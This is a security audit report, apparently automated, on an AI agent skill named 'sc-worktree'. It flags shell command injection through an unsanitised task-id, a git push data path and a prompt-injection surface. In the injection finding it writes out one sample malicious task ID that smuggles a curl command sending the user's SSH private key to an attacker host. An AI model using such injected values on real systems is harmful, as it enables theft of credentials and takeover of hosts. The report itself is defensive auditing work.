sc-worktree
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill constructs and executes shell commands using the
<task-id>parameter, specificallymkdir -p .worktrees/<task-id>andgit worktree add -b wt/<task-id> .worktrees/<task-id>. Without explicit sanitization, a malicious task ID containing shell metacharacters (e.g.,feature; curl http://attacker.com/$(cat ~/.ssh/id_rsa)) would lead to arbitrary command execution on the host system. - DATA_EXFILTRATION (LOW): The
proposecommand utilizesgit pushandgh pr createto send local branch data to remote repositories on GitHub. While this is the intended functionality, it establishes a network-based data movement path. Since it targets a trusted domain (github.com), it is classified as LOW severity per the [TRUST-SCOPE-RULE]. - INDIRECT_PROMPT_INJECTION (LOW): The skill possesses a vulnerable surface for indirect injection. 1. Ingestion points: The
<task-id>and--baseflags inSKILL.md. 2. Boundary markers: Absent; there are no delimiters or instructions to ignore embedded commands. 3. Capability inventory: Subprocess execution ofmkdir,git, andghacross all operations. 4. Sanitization: Absent; the instructions do not specify any validation or escaping of the user-provided strings before shell interpolation.
Recommendations
- AI detected serious security threats
Audit Metadata